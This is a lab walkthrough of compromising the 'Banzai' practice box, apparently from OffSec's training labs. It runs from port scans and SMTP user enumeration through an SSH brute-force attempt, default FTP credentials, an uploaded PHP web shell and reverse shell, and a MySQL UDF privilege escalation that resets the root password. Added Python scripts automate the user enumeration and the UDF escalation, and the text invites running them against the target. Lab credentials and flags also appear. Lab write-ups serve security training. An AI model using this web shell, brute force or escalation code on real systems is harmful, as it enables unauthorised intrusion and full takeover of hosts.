Banzai

The document details a series of Nmap scans performed on the IP address 192.168.241.56, revealing open ports and services including FTP, SSH, SMTP, PostgreSQL, and HTTP. Vulnerabilities were identified, particularly with Diffie-Hellman key exchanges and outdated software versions, alongside attempts to exploit these services through various methods including FTP file uploads and command execution via a web interface. Additionally, it includes findings from Nikto scans, PostgreSQL enumeration, and brute-force attempts, culminating in the discovery of database credentials for escalation purposes.

Uploaded by Vo Tinh

$ nmap -sV -sC -A -Pn 192.168.241.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-06 10:44 EST
Nmap scan report for 192.168.241.56
Host is up (0.12s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_ 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN,
STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.45 seconds

$ nmap -sC -sV -A -Pn -p- 192.168.241.56


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-06 10:45 EST
Nmap scan report for 192.168.241.56
Host is up (0.15s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_ 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN,
STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after: 2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Banzai
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE:
cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 561.71 seconds

$ nmap -Pn -p21,22,25,5432,8080,8295 --script vuln 192.168.242.56


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-18 11:30 EST
Nmap scan report for 192.168.242.56
Host is up (0.13s latency).

PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp open smtp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
|_sslv2-drown:
5432/tcp open postgresql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
8080/tcp open http-proxy
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8295/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 46.38 seconds

// ssl-dh-params: Postfix on 25 accepts anonymous DH (aNULL cipher suites, no server
// authentication, so STARTTLS sessions can be actively MitM'd) and PostgreSQL on 5432
// negotiates a 1024-bit DH group (weakdh.org). Neither gives a foothold; both are hardening
// findings for the report. The clamav-exec lines are NSE script failures, not findings.

FTP: anonymous login is refused.

Lesson learned from AuthBy: try admin/admin, and it works.

// The admin account can upload files, for example hello.txt. The upload is served by the
// vhost on port 8295, not the one on 8080 (admin's home directory is /var/www/html/, see
// /etc/passwd below, so FTP writes land straight in that webroot):

@ http://192.168.242.56:8080/hello.txt -> Not Found

@ http://192.168.242.56:8295/hello.txt -> the uploaded file is served

@ http://192.168.241.56:8080/
@ http://192.168.241.56:8295/

● Designed by BootstrapMade https://bootstrapmade.com/

$ nikto -h 192.168.241.56 -p 8295


- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.241.56
+ Target Hostname: 192.168.241.56
+ Target Port: 8295
+ Start Time: 2020-11-06 10:58:53 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false
positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-11-06 11:22:17 (GMT-5) (1404 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

// Enumeration PostgreSQL DB 9.6.4 - 9.6.6

// SMTP enumeration
$ telnet 192.168.241.56 25
EHLO offseclabs.com
VRFY root // user root
VRFY banzai // user banzai
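The VRFY check above is done by hand in telnet for two names. The following is an added example (not part of the original notes) that speaks the same EHLO/VRFY exchange over a socket and classifies the reply codes so a whole wordlist can be run through it. The server-side half is a constructed stand-in that answers the way a default Postfix does (252 for an address it would accept, 550 5.1.1 for an unknown local user); its user list and the 502 handling are assumptions made for the demo, and the EHLO name offseclabs.com is the one used in the notes.

```python
"""SMTP VRFY user enumeration, the EHLO/VRFY exchange from the notes done over a socket."""
import socket
import socketserver
import threading


def classify_vrfy_reply(reply: str) -> str:
    """Map the SMTP reply to a VRFY command onto an enumeration verdict.

    Postfix answers 252 ("cannot VRFY, but will accept delivery") for any address it
    would deliver to and 550 5.1.1 for an unknown local user; 502 means VRFY is switched
    off (disable_vrfy_command = yes), in which case RCPT TO is the fallback.
    """
    code = reply[:3]
    if code in ("250", "252"):
        return "exists"
    if code == "550":
        return "unknown"
    if code == "502":
        return "disabled"
    return "unclear"


def _read_reply(f) -> str:
    """Read one SMTP reply; continuation lines carry '-' in column 4, the last a space."""
    lines = []
    while True:
        line = f.readline().decode("utf-8", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return "\n".join(lines)


def vrfy_enum(host, port, users, helo="offseclabs.com", timeout=10):
    """Return {user: verdict} after one EHLO and one VRFY per user on a single session."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _read_reply(f)                                  # 220 banner
        s.sendall(f"EHLO {helo}\r\n".encode())
        _read_reply(f)                                  # 250-... capability list
        for user in users:
            s.sendall(f"VRFY {user}\r\n".encode())
            results[user] = classify_vrfy_reply(_read_reply(f))
        s.sendall(b"QUIT\r\n")
    return results


# Constructed stand-in for the Postfix on port 25, so the example runs offline.
# The user list is made up for the demo; real runs point vrfy_enum() at the target.
FAKE_LOCAL_USERS = {"root", "banzai", "postgres"}


class _FakePostfix(socketserver.StreamRequestHandler):
    def handle(self):
        self.wfile.write(b"220 banzai.offseclabs.com ESMTP Postfix\r\n")
        while True:
            line = self.rfile.readline().decode("utf-8", "replace").strip()
            if not line:
                return
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "EHLO":
                self.wfile.write(b"250-banzai.offseclabs.com\r\n250-VRFY\r\n250 8BITMIME\r\n")
            elif verb == "VRFY":
                if arg.split("@")[0] in FAKE_LOCAL_USERS:
                    self.wfile.write(f"252 2.0.0 {arg}\r\n".encode())
                else:
                    self.wfile.write(
                        f"550 5.1.1 <{arg}>: Recipient address rejected: "
                        f"User unknown in local recipient table\r\n".encode())
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_postfix():
    """Listen on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _FakePostfix)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_fake_postfix()
    print(vrfy_enum("127.0.0.1", port, ["root", "banzai", "nobody_here"]))
    srv.shutdown()
    srv.server_close()
```

Against the real box, call vrfy_enum("192.168.241.56", 25, wordlist). A 252 does not prove a shell account exists (aliases and virtual mailboxes answer the same), so cross-check hits against /etc/passwd once you have a shell, as the notes do.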
$ gobuster dir -u http://192.168.241.56:8295 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 4 -q
/index.php (Status: 200)
/img (Status: 301)
/css (Status: 301)
/lib (Status: 301)
/js (Status: 301)
/contactform (Status: 301)
...

// Brute-force the SSH password of user banzai (failed)

$ hydra -l banzai -P /home/kali/OSCP/wordlists/rockyou.txt 192.168.241.56 -t 4 ssh

// Create cmd.php as follows:

<?php system($_GET['cmd']); ?>

// Upload it via FTP (admin/admin); it lands in the 8295 webroot.

// Open it in the browser and run a command such as id. Anything beyond a single word
// (spaces, pipes, quotes) must be URL-encoded in the cmd parameter.

@ http://192.168.242.56:8295/cmd.php?cmd=id

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash
admin:x:1001:1001::/var/www/html/:
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
postfix:x:110:115::/var/spool/postfix:/bin/false
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

// Upload php-reverse-shell.php. Use a listener port the target can actually reach: 443 did
// not work here, 5432 did (outbound filtering; the same thing bites the linpeas download below).

// Trigger the reverse shell @ http://192.168.103.56:8295/php-reverse-shell.php

TODO: Try to upload cmd.php (like AuthBy for Windows)

● Executing a reverse-shell command from the browser: failed
● Generating a reverse shell with msfvenom and running it from the browser: failed
-> Maybe I chose the wrong port ???

Local.txt: 1cb20a49e87bd6496b2471f5f5abf091

// Port 80 is blocked outbound: downloading linpeas.sh from the attacker box over port 80
// failed; serving it on port 5432 works.

// linpeas' output shows nothing interesting, so we examine the folders manually.


// Found a database cred (root : EscalateRaftHubris123) in /var/www/config.php; first assumed
// it belonged to the PostgreSQL on port 5432:
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>
// psql is installed on the box and can be used to connect to PostgreSQL

// Try to connect (as www-data, admin and root with this password) but it fails:

$ psql -h 127.0.0.1 -p 5432 -d main -U root -W

// The password does not open any user's shell either

??? How to use this cred ???

This is not the PostgreSQL credential but the MySQL one (the box runs both databases: note the
mysql account in /etc/passwd, and DBHOST is 127.0.0.1, consistent with no 3306 in the port scan).

$ mysql -u root -p
Enter password: EscalateRaftHubris123

mysql> show databases;
mysql> use mysql;
mysql> show tables;
-> Nothing interesting, not even in the user table or in the other databases.
Privilege Escalation: Service accounts are there for a reason

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
https://www.exploit-db.com/exploits/1518

This is not a version-specific bug. Any MySQL whose daemon runs as root, and which lets us get a
shared library into its plugin directory (through the FILE privilege or a writable directory),
lets us register a UDF that calls system(); the commands then run as the mysqld user, root here.
Read more:
● https://highon.coffee/blog/lord-of-the-root-walkthrough/
● https://payatu.com/guide-linux-privilege-escalation
● Similar to Timeclock in OSCP Labs

// Download and compile the exploit "raptor_udf2.c" on the target

www-data@banzai:/tmp$ gcc -g -c raptor_udf2.c
www-data@banzai:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

// The shared library must end up in mysqld's plugin directory (here /usr/lib/mysql/plugin; on
// Timeclock it was /usr/lib). Otherwise "create function" fails with: cannot open shared object
// file. Ask the server for the path (its plugin_dir variable) rather than guessing. The cp below
// only works if www-data can write that directory; the "into dumpfile" step further down writes
// the file as the mysqld user instead, so only one of the two is needed, and dumpfile refuses
// to overwrite a file that already exists.

www-data@banzai:/tmp$ cp raptor_udf2.so /usr/lib/mysql/plugin/

// Run mysql
www-data@banzai:/tmp$ mysql -u root -p
Enter password: EscalateRaftHubris123

// Create a new table in the database mysql, and load the shared library
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

mysql> create function do_system returns integer soname 'raptor_udf2.so';

// Confirm the function is registered
mysql> select * from mysql.func;

// Run a command as root: set root's password to "passwd" (chpasswd output goes to /tmp/out,
// chown'd so it can be read back). This is destructive: note it for the report and revert it.

mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown banzai.banzai /tmp/out');

// Get a root shell with password "passwd"

www-data@banzai:/tmp$ su -
Password: passwd
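The sequence above hardcodes the plugin directory and skips the two server settings that decide whether the technique can work at all. The following is an added example, not part of the original notes or of the exploit-db entry, that runs the same statements but first asks the server for plugin_dir (the notes point out it was /usr/lib on Timeclock and /usr/lib/mysql/plugin here) and checks secure_file_priv, which would stop load_file() and INTO DUMPFILE. SQL goes through a caller-supplied run_sql(statement) callable so it can be wired to any DB-API driver; the FakeMySQL class at the bottom is a constructed stand-in whose answers are assumptions modelled on this box, so the example runs offline. The library path and the chpasswd command are the ones from the notes.

```python
"""raptor_udf2 MySQL UDF escalation with the pre-checks the notes skipped, driver-agnostic."""
import os


class UdfPrecheckError(RuntimeError):
    """Raised when the server's settings make the UDF route impossible."""


def mysql_udf_precheck(run_sql):
    """Return the server's plugin_dir, or raise if secure_file_priv blocks the file writes.

    secure_file_priv = NULL disables load_file()/INTO DUMPFILE entirely; a path confines
    them to that directory (so neither /tmp nor plugin_dir is reachable); "" means no limit.
    Whether mysqld runs as root is checked outside SQL, e.g. ps -o user= -C mysqld.
    """
    (plugin_dir,) = run_sql("select @@plugin_dir")[0]
    (sfp,) = run_sql("select @@secure_file_priv")[0]
    if sfp is None:
        raise UdfPrecheckError("secure_file_priv is NULL: file import/export disabled")
    if sfp != "":
        raise UdfPrecheckError(f"secure_file_priv={sfp!r} confines dumpfile; plugin_dir unreachable")
    return plugin_dir


def mysql_udf_escalate(run_sql, so_path="/tmp/raptor_udf2.so",
                       cmd='echo "root:passwd" | chpasswd > /tmp/out; chown banzai.banzai /tmp/out'):
    """Write the compiled library into plugin_dir through the server, register do_system, run cmd.

    run_sql(statement) must return a list of row tuples. cmd must not contain single quotes.
    Returns the path the library was written to. The dumpfile step fails if that file
    already exists, so do not also cp the library there by hand.
    """
    plugin_dir = mysql_udf_precheck(run_sql)
    so_name = os.path.basename(so_path)
    target = os.path.join(plugin_dir, so_name)
    run_sql("use mysql")
    run_sql("create table if not exists foo(line blob)")
    run_sql(f"insert into foo values(load_file('{so_path}'))")
    run_sql(f"select * from foo into dumpfile '{target}'")
    run_sql(f"create function do_system returns integer soname '{so_name}'")
    if not run_sql("select name, dl from mysql.func where name = 'do_system'"):
        raise UdfPrecheckError("do_system did not register; check mysqld's error log")
    run_sql(f"select do_system('{cmd}')")
    return target


# Constructed stand-in for a mysql connection so the example runs offline. It answers like
# the box in the notes (plugin_dir /usr/lib/mysql/plugin/, empty secure_file_priv). With a
# real DB-API cursor, pass e.g. lambda q: (cur.execute(q), list(cur.fetchall()))[1].
class FakeMySQL:
    def __init__(self, plugin_dir="/usr/lib/mysql/plugin/", secure_file_priv=""):
        self.plugin_dir, self.sfp = plugin_dir, secure_file_priv
        self.funcs = {}
        self.log = []

    def __call__(self, stmt):
        self.log.append(stmt)
        low = stmt.strip().lower()
        if low == "select @@plugin_dir":
            return [(self.plugin_dir,)]
        if low == "select @@secure_file_priv":
            return [(self.sfp,)]
        if low.startswith("create function"):
            self.funcs[low.split()[2]] = stmt.split("'")[1]
        if low.startswith("select name, dl from mysql.func"):
            return list(self.funcs.items())
        return []


if __name__ == "__main__":
    db = FakeMySQL()
    print(mysql_udf_escalate(db))
    print("\n".join(db.log))
```

On a server with secure_file_priv set to a directory (the MySQL 5.7+ packaged default on some distributions) the precheck stops before anything is written; that is the case to look for first when the notes' sequence fails with an "access denied" on the dumpfile step.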

Proof.txt: 7982105b92edc65dd8bd0e6837f1b399
